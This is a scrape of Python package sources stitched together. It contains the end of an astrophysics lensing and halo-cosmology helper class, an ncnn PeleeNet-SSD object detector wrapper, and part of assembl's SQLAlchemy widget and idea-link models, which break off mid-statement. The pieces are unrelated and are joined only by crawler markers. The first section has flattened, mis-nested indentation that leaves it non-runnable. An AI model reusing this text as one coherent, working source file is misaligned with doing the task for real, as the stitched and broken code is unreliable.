        # critical density for lensing in units M_sun * kpc ^ -2
        self.sigma_crit_lens_kpc = self.sigma_crit_lensing * (0.001) ** 2
        # critical density for lensing in units M_sun * arcsec ^ -2 at lens redshift
        self.sigmacrit = self.sigma_crit_lensing * (0.001) ** 2 * self.cosmo.kpc_proper_per_asec(z_lens) ** 2
        # lensing distances
        self.D_d, self.D_s, self.D_ds = self.cosmo.D_A_z(z_lens), self.cosmo.D_A_z(z_source), self.cosmo.D_A(
            z_lens, z_source)
    # flag guarding the lazily-built subhalo accretion PDF tables
    self._computed_zacc_pdf = False
    self._nfw_param = NFWParam(self.cosmo.astropy)
    self.z_lens = z_lens
    self.z_source = z_source
def two_halo_boost(self, m200, z, rmin=0.5, rmax=10):
"""
Computes the average contribution of the two halo term in a redshift slice adjacent
the main deflector. Returns a rescaling factor applied to the mass function normalization
:param m200: host halo mass
:param z: redshift
:param rmin: lower limit of the integral, something like the virial radius ~500 kpc
:param rmax: Upper limit of the integral, this is computed based on redshift spacing during
the rendering of halos
:return: scaling factor applied to the normalization of the LOS mass function
"""
mean_boost = 2 * quad(self.twohaloterm, rmin, rmax, args=(m200, z))[0] / (rmax - rmin)
# factor of two for symmetry in front/behind host halo
return 1. + mean_boost
def twohaloterm(self, r, M, z, mdef='200c'):
    """Boost to the background density of the Universe from correlated
    structure around a host of mass M.

    :param r: radius
    :param M: host mass
    :param z: redshift
    :param mdef: colossus mass definition string
    :return: dimensionless overdensity from the two-halo term
    """
    # colossus expects little-h units, so scale both arguments by h
    little_h = self.cosmo.h
    rho_2h = twoHaloTerm(r * little_h, M * little_h, z, mdef=mdef)
    return rho_2h / self.cosmo._colossus_cosmo.rho_m(z)
def nfw_physical2angle(self, m, c, z, no_interp=False):
"""
converts the physical mass and concentration parameter of an NFW profile into the lensing quantities
updates lenstronomy implementation with arbitrary redshift
:param m: mass enclosed 200 rho_crit in units of M_sun (physical units, meaning no little h)
:param c: NFW concentration parameter (r200/r_s)
:param no_interp: bool; compute NFW params with interpolation
:return: Rs_angle (angle at scale radius) (in units of arcsec), alpha_Rs (observed bending angle at the scale radius
"""
dd = self.cosmo.D_A_z(z)
rho0, Rs, r200 = self.nfwParam_physical(m, c, z)
Rs_angle = Rs / dd / self._arcsec # Rs in arcsec
alpha_Rs = rho0 * (4 * Rs ** 2 * (1 + numpy.log(1. / 2.)))
sigma_crit = self.get_sigma_crit_lensing(z, self.z_source)
return Rs_angle, alpha_Rs / sigma_crit / dd / self._arcsec
def rN_M(self, M, z, N):
"""
computes the radius R_N of a halo of mass M in physical mass M/h, where N is a number multiplying the critical
density of the Universe at z
:param M: halo mass in M_sun/h
:param z: redshift
:param N: number, e.g. N=200 computes r200
:return: radius R_N in physical Mpc/h
"""
rn_mpc_over_h = (3 * M / (4 * numpy.pi * self._nfw_param.rhoc_z(z) * N)) ** (1. / 3.)
return rn_mpc_over_h / self.cosmo.h
def nfwParam_physical(self, m, c, z):
"""
returns the NFW parameters in physical units
updates lenstronomy implementation with arbitrary redshift
:param m: physical mass in M_sun
:param c: concentration
:return: rho0 [Msun/Mpc^3], Rs [Mpc], r200 [Mpc]
"""
r200 = self._nfw_param.r200_M(m * self.h, z) / self.h # physical radius r200
rho0 = self._nfw_param.rho0_c(c, z) * self.h**2 # physical density in M_sun/Mpc**3
Rs = r200/c
return rho0, Rs, r200
def NFW_params_physical(self, m, c, z):
"""
returns the NFW parameters in physical units
:param M: physical mass in M_sun
:param c: concentration
:return: rho0 [Msun/kpc^3], Rs [kpc], r200 [kpc]
"""
rho0, Rs, r200 = self.nfwParam_physical(m, c, z)
return rho0 * 1000 ** -3, Rs * 1000, r200 * 1000
def sigma_crit_mass(self, z, area):
"""
:param z: redshift
:param area: physical area in Mpc^2
:return: the 'critical density mass' sigma_crit * A in units M_sun
"""
sigma_crit_mpc = self.get_sigma_crit_lensing(z, self.z_source)
return area * sigma_crit_mpc
@property
def colossus(self):
return self.cosmo.colossus
######################################################
"""ACCESS ROUTINES IN STRUCTURAL PARAMETERS CLASS"""
######################################################
def mthermal_to_halfmode(self, m_thermal):
"""
Convert thermal relic particle mass to half-mode mass
:param m_thermaal:
:return:
"""
# too lazy for algebra
def _func(m):
return abs(self.halfmode_to_thermal(m)-m_thermal)/0.01
return minimize(_func, x0=10**8, method='Nelder-Mead')['x']
def halfmode_to_thermal(self, m_half_mode):
"""
Converts a half mode mass in units of solar masses (no little h) to the mass of
the corresponding thermal relic particle in keV
:param m: half mode mass in solar masses
:return: thermal relic particle mass in keV
"""
omega_matter = self.cosmo.astropy.Om0
return 2.32 * (omega_matter / 0.25)**0.4 * (self.cosmo.h/0.7)**0.8 * \
(m_half_mode / 10 ** 9) ** (-0.3)
def mhm_to_fsl(self, m_hm):
"""
Converts half mode mass to free streaming length in Mpc
See Equations 5-8 in https://arxiv.org/pdf/1112.0330.pdf
:param m_hm: half-mode mass in units M_sun (no little h)
:return: free streaming length in units Mpc
"""
rhoc = self.rhoc * self.cosmo.h ** 2
l_hm = 2 * (3 * m_hm / (4 * numpy.pi * rhoc)) ** (1. / 3)
l_fs = l_hm / 13.93
return l_fs
##################################################################################
"""ROUTINES RELATED TO LENSING STUFF"""
##################################################################################
def get_sigma_crit_lensing(self, z1, z2):
"""
:param z1: redshift lens
:param z2: redshift source
:return: critical density for lensing in units of M_sun / Mpc ^ 2
"""
D_ds = self.cosmo.D_A(z1, z2)
D_d = self.cosmo.D_A_z(z1)
D_s = self.cosmo.D_A_z(z2)
d_inv = D_s*D_ds**-1*D_d**-1
# (Mpc ^2 / sec^2) * (Mpc^-3 M_sun^1 sec ^ 2) * Mpc ^-1 = M_sun / Mpc ^2
epsilon_crit = (self.cosmo.c**2*(4*numpy.pi*self.cosmo.G)**-1)*d_inv
return epsilon_crit
# ##################################################################################
# """Routines relevant for NFW profiles"""
# ##################################################################################
# def NFW_params_physical(self, M, c, z):
# """
#
# :param M: physical M200
# :param c: concentration
# :param z: halo redshift
# :return: physical NFW parameters in kpc units
# """
#
# rho0, Rs, r200 = self.nfwParam_physical_Mpc(M, c, z)
# return rho0 * 1000 ** -3, Rs * 1000, r200 * 1000
#
# def nfw_physical2angle_fromNFWparams(self, rhos, rs, z):
#
# """
# computes the deflection angle properties of an NFW halo from the density normalization mass and scale radius
# :param rhos: central density normalization in M_sun / Mpc^3
# :param rs: scale radius in Mpc
# :param z: redshift
# :return: theta_Rs (deflection angle at the scale radius) [arcsec], scale radius [arcsec]
# """
#
# D_d = self.cosmo.D_A_z(z)
# Rs_angle = rs / D_d / self.cosmo.arcsec # Rs in arcsec
# theta_Rs = rhos * (4 * rs ** 2 * (1 + numpy.log(1. / 2.)))
# eps_crit = self.get_sigma_crit_lensing(z, self.z_source)
#
# return Rs_angle, theta_Rs / eps_crit / D_d / self.cosmo.arcsec
#
# def nfw_physical2angle(self, M, c, z):
# """
# converts the physical mass and concentration parameter of an NFW profile into the lensing quantities
# :param M: mass enclosed 200 \rho_crit
# :param c: NFW concentration parameter (r200/r_s)
# :return: theta_Rs (observed bending angle at the scale radius, Rs_angle (angle at scale radius) (in units of arcsec)
# """
#
# rhos, rs, _ = self.nfwParam_physical_Mpc(M, c, z)
# return self.nfw_physical2angle_fromNFWparams(rhos, rs, z)
#
# def rho0_c_NFW(self, c, z_eval_rho=0., N=200):
# """
# computes density normalization as a function of concentration parameter
#
# :param c: concentration
# :param z_eval_rho: redshift at which to evaluate the critical density
# :param N: the density contrast used to define the halo mass
# :return: density normalization in h^2/Mpc^3 (comoving)
# """
#
# rho_crit = self.cosmo.rho_crit(z_eval_rho) / self.cosmo.h ** 2
# return N / 3 * rho_crit * c ** 3 / (numpy.log(1 + c) - c / (1 + c))
#
# def rN_M_nfw_comoving(self, M, N, z):
# """
# computes the radius R_N of a halo of mass M in comoving distances
# :param M: halo mass in M_sun/h
# :type M: float or numpy array
# :return: radius R_200 in comoving Mpc/h
# """
#
# rho_crit = self.cosmo.rho_crit(z) / self.cosmo.h ** 2
# return (3 * M / (4 * numpy.pi * rho_crit * N)) ** (1. / 3.)
#
# def nfwParam_physical_Mpc(self, M, c, z, N=200):
#
# """
#
# :param M: halo mass in units M_sun (no little h)
# :param c: concentration parameter
# :param z: redshift
# :return: physical rho_s, rs for the NFW profile in comoving units
# Mass definition critical density of Universe with respect to critical density at redshift z
# Also specified in colossus as 200c
# """
#
# h = self.cosmo.h
# r200 = self.rN_M_nfw_comoving(M * h, N, z) / h # comoving virial radius
# rhos = self.rho0_c_NFW(c, z, N) * h ** 2 # density in M_sun/Mpc**3
# rs = r200 / c
# return rhos, rs, r200
##################################################################################
"""Routines relevant for other lensing by other mass profiles"""
##################################################################################
def point_mass_factor_z(self, z):
"""
Returns the cosmology-dependent factor to evaluate the Einstein radius of a point mass of mass M:
:param z: redshift
:return: The factor that when multiplied by sqrt(mass) gives the Einstein radius of a point mass
R_ein = sqrt(M) * point_mass_factor_z(z)
"""
factor = 4 * self.cosmo.G * self.cosmo.c ** -2
dds = self.cosmo.D_A(z, self.z_source)
dd = self.cosmo.D_A_z(z)
ds = self.D_s
factor *= dds / dd / ds
return factor ** 0.5 / self.cosmo.arcsec
def halo_dynamical_time(self, m_host, z, c_host):
"""
This routine computes the dynamical timescale for a halo of mass M defined as
t = 0.5427 / sqrt(G*rho)
where G is the gravitational constant and rho is the average density
:param m_host: host mass in M_sun
:param z: host redshift
:param c_host: host halo concentration
:return: the dynamical timescale in Gyr
"""
_, _, rvir = self.NFW_params_physical(m_host, c_host, z)
volume = (4/3)*numpy.pi*rvir**3
rho_average = m_host / volume
g = 4.3e-6
return 0.5427 / numpy.sqrt(g*rho_average)
##################################################################################
"""ACCRETION REDSHIFT PDF FROM GALACTICUS"""
##################################################################################
@property
def _subhalo_accretion_pdfs(self):
if self._computed_zacc_pdf is False:
self._computed_zacc_pdf = True
self._mlist, self._dzvals, self._cdfs = self._Msub_cdfs(self.z_lens)
return self._mlist, self._dzvals, self._cdfs
def z_accreted_from_zlens(self, msub, zlens):
mlist, dzvals, cdfs = self._subhalo_accretion_pdfs
idx = self._mass_index(msub, mlist)
z_accreted = zlens + self._sample_cdf_single(cdfs[idx])
return z_accreted
def _cdf_numerical(self, m, z_lens, delta_z_values):
c_d_f = []
prob = 0
for zi in delta_z_values:
prob += self._P_fit_diff_M_sub(z_lens + zi, z_lens, m)
c_d_f.append(prob)
return numpy.array(c_d_f) / c_d_f[-1]
def _Msub_cdfs(self, z_lens):
M_sub_exp = numpy.arange(6.0, 10.2, 0.2)
M_sub_list = 10 ** M_sub_exp
delta_z = numpy.linspace(0., 6, 8000)
funcs = []
for mi in M_sub_list:
# cdfi = P_fit_diff_M_sub_cumulative(z_lens+delta_z, z_lens, mi)
cdfi = self._cdf_numerical(mi, z_lens, delta_z)
funcs.append(interp1d(cdfi, delta_z))
return M_sub_list, delta_z, funcs
def z_decay_mass_dependence(self, M_sub):
# Mass dependence of z_decay.
a = 3.21509397
b = 1.04659814e-03
return a - b * numpy.log(M_sub / 1.0e6) ** 3
def z_decay_exp_mass_dependence(self, M_sub):
# Mass dependence of z_decay_exp.
a = 0.30335749
b = 3.2777e-4
return a - b * numpy.log(M_sub / 1.0e6) ** 3
def _P_fit_diff_M_sub(self, z, z_lens, M_sub):
# Given the redhsift of the lens, z_lens, and the subhalo mass, M_sub, return the
# posibility that the subhlao has an accretion redhisft of z.
z_decay = self.z_decay_mass_dependence(M_sub)
z_decay_exp = self.z_decay_exp_mass_dependence(M_sub)
normalization = 2.0 / numpy.sqrt(2.0 * numpy.pi) / z_decay \
/ numpy.exp(0.5 * z_decay ** 2 * z_decay_exp ** 2) \
/ erfc(z_decay * z_decay_exp / numpy.sqrt(2.0))
return normalization * numpy.exp(-0.5 * ((z - z_lens) / z_decay) ** 2) \
* numpy.exp(-z_decay_exp * (z - z_lens))
def _sample_cdf_single(self, cdf_interp):
u = numpy.random.uniform(0, 1)
try:
output = float(cdf_interp(u))
if numpy.isnan(output):
output = 0
except:
output = 0
return output
def _mass_index(self, subhalo_mass, mass_array):
idx = numpy.argmin(numpy.absolute(subhalo_mass - mass_array))
return idx
|
PypiClean
|
/realsr-ncnn-vulkan-python-1.0.6.tar.gz/realsr-ncnn-vulkan-python-1.0.6/realsr_ncnn_vulkan_python/realsr-ncnn-vulkan/src/ncnn/python/ncnn/model_zoo/peleenetssd.py
|
import ncnn
from .model_store import get_model_file
from ..utils.objects import Detect_Object
class PeleeNet_SSD:
    """PeleeNet-SSD object detector (plus a segmentation branch) over ncnn.

    Loads the "pelee.param"/"pelee.bin" model files via get_model_file and
    runs inference on BGR image arrays through __call__.
    """

    def __init__(self, target_size=304, num_threads=1, use_gpu=False):
        """
        :param target_size: square side the input image is resized to
        :param num_threads: thread count used by the ncnn extractor
        :param use_gpu: enable Vulkan compute when True
        """
        self.target_size = target_size
        self.num_threads = num_threads
        self.use_gpu = use_gpu

        # per-channel mean subtraction and scale applied to the input blob
        self.mean_vals = [103.9, 116.7, 123.6]
        self.norm_vals = [0.017, 0.017, 0.017]

        self.net = ncnn.Net()
        self.net.opt.use_vulkan_compute = self.use_gpu

        # model is converted from https://github.com/eric612/MobileNet-YOLO
        # and can be downloaded from https://drive.google.com/open?id=1Wt6jKv13sBRMHgrGAJYlOlRF-o80pC0g
        # the ncnn model https://github.com/nihui/ncnn-assets/tree/master/models
        self.net.load_param(get_model_file("pelee.param"))
        self.net.load_model(get_model_file("pelee.bin"))

        # index -> class label for the detection output
        self.class_names = [
            "background",
            "person",
            "rider",
            "car",
            "bus",
            "truck",
            "bike",
            "motor",
            "traffic light",
            "traffic sign",
            "train",
        ]

    def __del__(self):
        # Release the network so ncnn frees its resources.
        self.net = None

    def __call__(self, img):
        """Run detection on a BGR image.

        :param img: HxWx3 BGR image array
        :return: (list of Detect_Object with rects scaled to pixel
            coordinates, segmentation output resized to the input size)
        """
        img_h = img.shape[0]
        img_w = img.shape[1]

        mat_in = ncnn.Mat.from_pixels_resize(
            img,
            ncnn.Mat.PixelType.PIXEL_BGR,
            img.shape[1],
            img.shape[0],
            self.target_size,
            self.target_size,
        )
        mat_in.substract_mean_normalize(self.mean_vals, self.norm_vals)

        ex = self.net.create_extractor()
        ex.set_num_threads(self.num_threads)

        ex.input("data", mat_in)

        ret, mat_out = ex.extract("detection_out")

        objects = []

        # printf("%d %d %d\n", mat_out.w, mat_out.h, mat_out.c)

        # method 1, use ncnn.Mat.row to get the result, no memory copy
        for i in range(mat_out.h):
            values = mat_out.row(i)
            obj = Detect_Object()
            obj.label = values[0]
            obj.prob = values[1]
            # outputs are normalized to [0, 1]; scale back to pixels
            obj.rect.x = values[2] * img_w
            obj.rect.y = values[3] * img_h
            obj.rect.w = values[4] * img_w - obj.rect.x
            obj.rect.h = values[5] * img_h - obj.rect.y
            objects.append(obj)

        """
        #method 2, use ncnn.Mat->numpy.array to get the result, no memory copy too
        out = np.array(mat_out)
        for i in range(len(out)):
            values = out[i]
            obj = Detect_Object()
            obj.label = values[0]
            obj.prob = values[1]
            obj.rect.x = values[2] * img_w
            obj.rect.y = values[3] * img_h
            obj.rect.w = values[4] * img_w - obj.rect.x
            obj.rect.h = values[5] * img_h - obj.rect.y
            objects.append(obj)
        """

        ret, seg_out = ex.extract("sigmoid")
        resized = ncnn.Mat()
        # bilinear-resize the segmentation map back to the input image size
        ncnn.resize_bilinear(seg_out, resized, img_w, img_h)

        return objects, resized
|
PypiClean
|
/idealoom-0.1.0-py3-none-any.whl/assembl/models/widgets.py
|
from itertools import chain
from datetime import datetime
import logging
from sqlalchemy import (
Column, Integer, ForeignKey, Text, String, Boolean, DateTime, inspect)
from sqlalchemy.sql import text, column
from sqlalchemy.orm import (
relationship, backref, aliased, join)
from sqlalchemy.ext.associationproxy import association_proxy
import simplejson as json
from assembl.lib.parsedatetime import parse_datetime
from ..auth import (
CrudPermissions, Everyone, P_ADD_IDEA, P_READ, P_EDIT_IDEA,
P_ADD_POST, P_ADMIN_DISC)
from ..lib.sqla_types import URLString
from . import DiscussionBoundBase
from .discussion import Discussion
from .idea import (Idea, IdeaLink)
from .idea_content_link import IdeaContentWidgetLink
from .generic import Content
from .post import Post, IdeaProposalPost
from .auth import User
from .votes import AbstractVoteSpecification, AbstractIdeaVote
from ..views.traversal import (
RelationCollectionDefinition, AbstractCollectionDefinition,
collection_creation_side_effects, InstanceContext)
from ..semantic.virtuoso_mapping import QuadMapPatternS
from ..semantic.namespaces import (ASSEMBL, QUADNAMES)
log = logging.getLogger(__name__)
class Widget(DiscussionBoundBase):
    """Base model for discussion widgets: configurable UI components
    (creativity sessions, votes, inspiration...) attached to a discussion.

    Settings and state are stored as JSON text blobs; per-user state lives
    in WidgetUserConfig rows. A widget may be limited to a start/end window.
    """
    __tablename__ = "widget"

    id = Column(Integer, primary_key=True)
    type = Column(String(60), nullable=False)  # polymorphic discriminator

    __mapper_args__ = {
        'polymorphic_identity': 'widget',
        'polymorphic_on': 'type',
        'with_polymorphic': '*'
    }

    settings = Column(Text)  # JSON blob
    state = Column(Text)  # JSON blob

    discussion_id = Column(
        Integer,
        ForeignKey('discussion.id', ondelete="CASCADE", onupdate="CASCADE"),
        nullable=False, index=True
    )
    discussion = relationship(
        Discussion, backref=backref("widgets", cascade="all, delete-orphan"),
        info={'rdf': QuadMapPatternS(None, ASSEMBL.in_conversation)})

    start_date = Column(DateTime, server_default=None)
    end_date = Column(DateTime, server_default=None)
    hide_notification = Column(Boolean, server_default='false', default=False)

    def __init__(self, *args, **kwargs):
        super(Widget, self).__init__(*args, **kwargs)
        # Apply side effects of the initial settings (subclass hook).
        self.interpret_settings(self.settings_json)

    def interpret_settings(self, settings):
        """Hook for subclasses to apply side effects of their settings."""
        pass

    def populate_from_context(self, context):
        # Fill the discussion from the traversal context when missing.
        if not(self.discussion or self.discussion_id):
            self.discussion = context.get_instance_of_class(Discussion)
        super(Widget, self).populate_from_context(context)

    def get_discussion_id(self):
        return self.discussion_id

    @classmethod
    def get_discussion_conditions(cls, discussion_id, alias_maker=None):
        return (cls.discussion_id == discussion_id,)

    @classmethod
    def get_ui_endpoint_base(cls):
        # TODO: Make this configurable.
        return None

    @property
    def configured(self):
        """Whether the widget has enough settings to be usable; see subclasses."""
        return True

    def get_ui_endpoint(self):
        uri = self.get_ui_endpoint_base()
        assert uri
        return "%s?config=%s" % (uri, self.uri())

    def get_user_state_url(self):
        return 'local:Widget/%d/user_state' % (self.id,)

    def get_settings_url(self):
        return 'local:Widget/%d/settings' % (self.id,)

    def get_state_url(self):
        return 'local:Widget/%d/state' % (self.id,)

    def get_user_states_url(self):
        return 'local:Widget/%d/user_states' % (self.id,)

    # Eventually: Use extra_columns to get WidgetUserConfig
    # through user_id instead of widget_user_config.id

    @property
    def settings_json(self):
        """The decoded settings blob; always a dict."""
        if self.settings:
            settings = json.loads(self.settings)
            # Do not allow non-dict settings
            if isinstance(settings, dict):
                return settings
        return {}

    @settings_json.setter
    def settings_json(self, val):
        self.settings = json.dumps(val)
        self.interpret_settings(val)

    @property
    def state_json(self):
        """The decoded state blob; {} when unset."""
        if self.state:
            return json.loads(self.state)
        return {}

    @state_json.setter
    def state_json(self, val):
        self.state = json.dumps(val)

    def get_user_state(self, user_id):
        """Return the given user's state dict, or None if never stored."""
        state = self.db.query(WidgetUserConfig).filter_by(
            widget=self, user_id=user_id).first()
        if state:
            return state.state_json

    def get_all_user_states(self):
        return [c.state_json for c in self.user_configs]

    def set_user_state(self, user_state, user_id):
        """Create or update the given user's state record."""
        state = self.db.query(WidgetUserConfig).filter_by(
            widget=self, user_id=user_id).first()
        if not state:
            state = WidgetUserConfig(widget=self, user_id=user_id)
            self.db.add(state)
        state.state_json = user_state

    def update_from_json(self, json, user_id=None, context=None, object_importer=None,
                         permissions=None, parse_def_name='default_reverse'):
        modified = super(Widget, self).update_from_json(
            json, user_id, context, object_importer, permissions, parse_def_name)
        # Piggyback per-user state updates on the generic json update.
        if user_id and user_id != Everyone and 'user_state' in json:
            modified.set_user_state(json['user_state'], user_id)
        return modified

    @classmethod
    def filter_started(cls, query):
        # SQLA clause; `== None` is intentional (IS NULL).
        return query.filter(
            (cls.start_date == None) | (cls.start_date <= datetime.utcnow()))

    @classmethod
    def test_active(cls):
        """SQLA clause: the widget has started and has not ended.

        BUGFIX: `&` binds tighter than `|` in Python, so the previous
        un-parenthesized expression grouped as
        end_is_null | (end_in_future & start_is_null) | started,
        which did not express "(not ended) AND started". Parenthesize
        explicitly to mirror is_active().
        """
        now = datetime.utcnow()
        return (((cls.end_date == None) | (cls.end_date > now))
                & ((cls.start_date == None) | (cls.start_date <= now)))

    @classmethod
    def filter_active(cls, query):
        return query.filter(cls.test_active())

    def is_started(self):
        return self.start_date == None or self.start_date <= datetime.utcnow()

    def is_ended(self):
        return self.end_date != None and self.end_date < datetime.utcnow()

    def is_active(self):
        return self.is_started() and not self.is_ended()

    @property
    def activity_state(self):
        # TODO: Convert to enum
        if not self.is_started():
            return "not started"
        if self.is_ended():
            return "ended"
        return "active"

    @classmethod
    def test_ended(cls):
        """SQLA clause: the widget has an end date in the past.

        BUGFIX: was `|` (OR), which counted any widget with a non-null
        end_date as ended even if the end date was in the future; use `&`
        to mirror is_ended().
        """
        return (cls.end_date != None) & (cls.end_date < datetime.utcnow())

    crud_permissions = CrudPermissions(P_ADMIN_DISC)

    def notification_data(self, notification_setting_data):
        """Hook: subclasses return a notification payload dict; None here."""
        pass

    def has_notification(self):
        """Yield notification payloads for notifications active right now."""
        settings = self.settings_json
        notifications = settings.get('notifications', [])
        now = datetime.utcnow()
        for notification in notifications:
            try:
                start = parse_datetime(notification['start'])
                end = notification.get('end', None)
                end = parse_datetime(end) if end else datetime.max
                if now < start or now > end:
                    continue
            except (ValueError, TypeError, KeyError) as e:
                # malformed notification entries are skipped silently
                continue
            notification_data = self.notification_data(notification)
            if notification_data:
                yield notification_data
class IdeaWidgetLink(DiscussionBoundBase):
    """Polymorphic association between an Idea and a Widget.

    Subclasses give the link its meaning (base idea, generated idea,
    votable idea, voting criterion, ...).
    """
    __tablename__ = 'idea_widget_link'

    id = Column(Integer, primary_key=True,
        info={'rdf': QuadMapPatternS(None, ASSEMBL.db_id)})
    type = Column(String(60))  # polymorphic discriminator

    idea_id = Column(Integer, ForeignKey(Idea.id),
                     nullable=False, index=True)
    idea = relationship(
        Idea, primaryjoin=(Idea.id == idea_id),
        backref=backref("widget_links", cascade="all, delete-orphan"))

    widget_id = Column(Integer, ForeignKey(
        Widget.id, ondelete="CASCADE", onupdate="CASCADE"),
        nullable=False, index=True)
    widget = relationship(Widget, backref=backref(
        'idea_links', cascade="all, delete-orphan"))

    context_url = Column(URLString())

    __mapper_args__ = {
        'polymorphic_identity': 'abstract_idea_widget_link',
        'polymorphic_on': type,
        'with_polymorphic': '*'
    }

    def populate_from_context(self, context):
        # Fill missing endpoints from the traversal context.
        if not(self.widget or self.widget_id):
            self.widget = context.get_instance_of_class(Widget)
        if not(self.idea or self.idea_id):
            self.idea = context.get_instance_of_class(Idea)
        super(IdeaWidgetLink, self).populate_from_context(context)

    def get_discussion_id(self):
        # The link belongs to the discussion of its idea.
        idea = self.idea or Idea.get(self.idea_id)
        return idea.get_discussion_id()

    @classmethod
    def get_discussion_conditions(cls, discussion_id, alias_maker=None):
        return ((cls.idea_id == Idea.id),
                (Idea.discussion_id == discussion_id))

    discussion = relationship(
        Discussion, viewonly=True, uselist=False, secondary=Idea.__table__,
        info={'rdf': QuadMapPatternS(None, ASSEMBL.in_conversation)})

    crud_permissions = CrudPermissions(
        P_ADD_IDEA, P_READ, P_EDIT_IDEA, P_EDIT_IDEA,
        P_EDIT_IDEA, P_EDIT_IDEA)
# Note: declare all subclasses of IdeaWidgetLink here,
# so we can use polymorphic_filter later.
def PolymorphicMixinFactory(base_class):
    """Build a marker mixin exposing polymorphic-identity helpers.

    The returned class offers classmethods that (a) list the polymorphic
    identities registered on ``base_class``'s mapper whose mapped classes
    subclass the mixin, and (b) build a SQLAlchemy filter clause selecting
    rows with those identities.
    """
    class PolymorphicMixin(object):
        "A marker class that provides polymorphic_filter"

        @classmethod
        def polymorphic_identities(cls):
            "Return the list of polymorphic identities defined in subclasses"
            mapping = base_class.__mapper__.polymorphic_map
            return [identity for (identity, mapper) in mapping.items()
                    if issubclass(mapper.class_, cls)]

        @classmethod
        def polymorphic_filter(cls):
            "Return a SQLA expression that tests for subclasses of this class"
            identities = cls.polymorphic_identities()
            return base_class.__mapper__.polymorphic_on.in_(identities)

    return PolymorphicMixin
class BaseIdeaWidgetLink(IdeaWidgetLink):
    """Link from a widget to its single base idea."""
    __mapper_args__ = {
        'polymorphic_identity': 'base_idea_widget_link',
    }
class GeneratedIdeaWidgetLink(IdeaWidgetLink):
    """Link marking an idea as generated by (created through) a widget."""
    __mapper_args__ = {
        'polymorphic_identity': 'generated_idea_widget_link',
    }
# Marker mixins used to tag IdeaWidgetLink subclasses whose linked ideas a
# widget "shows" (directly, or through the idea's descendants). They provide
# polymorphic_filter() for the relationship primaryjoins declared below.
IdeaShowingWidgetLink = PolymorphicMixinFactory(
    IdeaWidgetLink)
IdeaDescendantsShowingWidgetLink = PolymorphicMixinFactory(
    IdeaWidgetLink)
class IdeaInspireMeWidgetLink(
        IdeaDescendantsShowingWidgetLink, BaseIdeaWidgetLink):
    """Base-idea link of an InspirationWidget; shows the idea's descendants."""
    __mapper_args__ = {
        'polymorphic_identity': 'idea_inspire_me_widget_link',
    }
class IdeaCreativitySessionWidgetLink(
        IdeaShowingWidgetLink, BaseIdeaWidgetLink):
    """Base-idea link of a CreativitySessionWidget; shows the idea itself."""
    __mapper_args__ = {
        'polymorphic_identity': 'idea_creativity_session_widget_link',
    }
class VotableIdeaWidgetLink(IdeaShowingWidgetLink, IdeaWidgetLink):
    """Link marking an idea as a voting target of a VotingWidget."""
    __mapper_args__ = {
        'polymorphic_identity': 'votable_idea_widget_link',
    }
class VotedIdeaWidgetLink(IdeaWidgetLink):
    """Link marking an idea as having received votes through a widget."""
    __mapper_args__ = {
        'polymorphic_identity': 'voted_idea_widget_link',
    }
class VotingCriterionWidgetLink(IdeaWidgetLink):
    """Link marking an idea as a voting criterion of a VotingWidget."""
    __mapper_args__ = {
        'polymorphic_identity': 'criterion_widget_link',
    }
# Then declare relationships

# Convenience proxy: the widgets linked to an idea (through widget_links).
Idea.widgets = association_proxy('widget_links', 'widget')

# Links (of "showing" subtypes) between widgets and the ideas they show.
Widget.showing_idea_links = relationship(
    IdeaWidgetLink,
    primaryjoin=((Widget.id == IdeaWidgetLink.widget_id)
                 & IdeaShowingWidgetLink.polymorphic_filter()))
Idea.has_showing_widget_links = relationship(
    IdeaWidgetLink,
    primaryjoin=((Idea.id == IdeaWidgetLink.idea_id)
                 & IdeaShowingWidgetLink.polymorphic_filter()))

# The ideas a widget shows, resolved through the showing links above.
Widget.showing_ideas = relationship(
    Idea, viewonly=True, secondary=IdeaWidgetLink.__table__,
    primaryjoin=((Widget.id == IdeaWidgetLink.widget_id)
                 & IdeaShowingWidgetLink.polymorphic_filter()),
    secondaryjoin=IdeaWidgetLink.idea_id == Idea.id,
    backref='showing_widget')

# Showing links restricted to widgets that are currently active.
Idea.active_showing_widget_links = relationship(
    IdeaWidgetLink, viewonly=True,
    primaryjoin=((IdeaWidgetLink.idea_id == Idea.id)
                 & IdeaShowingWidgetLink.polymorphic_filter()
                 & (IdeaWidgetLink.widget_id == Widget.id)
                 & Widget.test_active()))
class BaseIdeaWidget(Widget):
    """A widget attached to a :py:class:`assembl.models.idea.Idea`, its ``base_idea``"""
    __mapper_args__ = {
        'polymorphic_identity': 'idea_view_widget',
    }

    base_idea_link = relationship(BaseIdeaWidgetLink, uselist=False)
    # Subclasses may override the link class used by set_base_idea_id.
    base_idea_link_class = BaseIdeaWidgetLink

    def interpret_settings(self, settings):
        # The 'idea' setting names the base idea this widget attaches to.
        if 'idea' in settings:
            self.set_base_idea_id(Idea.get_database_id(settings['idea']))

    def base_idea_id(self):
        # Id of the linked base idea, or None when not yet linked.
        if self.base_idea_link:
            return self.base_idea_link.idea_id

    def set_base_idea_id(self, id):
        # Create or repoint the base-idea link.
        idea = Idea.get_instance(id)
        if self.base_idea_link:
            self.base_idea_link.idea_id = id
        else:
            self.base_idea_link = self.base_idea_link_class(
                widget=self, idea=idea)
            self.db.add(self.base_idea_link)
        # This is wrong, but not doing it fails.
        self.base_idea = idea

    def get_ideas_url(self):
        return 'local:Conversation/%d/widgets/%d/base_idea/-/children' % (
            self.discussion_id, self.id)

    def get_messages_url(self):
        return 'local:Conversation/%d/widgets/%d/base_idea/-/widgetposts' % (
            self.discussion_id, self.id)

    @classmethod
    def extra_collections(cls):
        # REST sub-collections exposed under this widget.
        return (BaseIdeaCollection(),
                BaseIdeaDescendantsCollection('base_idea_descendants'))
# The widget's base idea, resolved through its BaseIdeaWidgetLink (or a
# subclass thereof, via the polymorphic filter).
BaseIdeaWidget.base_idea = relationship(
    Idea, viewonly=True, secondary=BaseIdeaWidgetLink.__table__,
    primaryjoin=((BaseIdeaWidget.id == BaseIdeaWidgetLink.widget_id)
                 & BaseIdeaWidgetLink.polymorphic_filter()),
    secondaryjoin=BaseIdeaWidgetLink.idea_id == Idea.id,
    uselist=False)
class BaseIdeaCollection(RelationCollectionDefinition):
    """The 'collection' of the ``base_idea`` of this :py:class:`BaseIdeaWidget`"""

    def __init__(self, name=None):
        super(BaseIdeaCollection, self).__init__(
            BaseIdeaWidget, BaseIdeaWidget.base_idea, name)

    def decorate_query(self, query, owner_alias, last_alias, parent_instance, ctx):
        # Restrict the query to the base idea linked to parent_instance,
        # joining through BaseIdeaWidgetLink (and its subclasses).
        widget = owner_alias
        idea = last_alias
        return query.join(
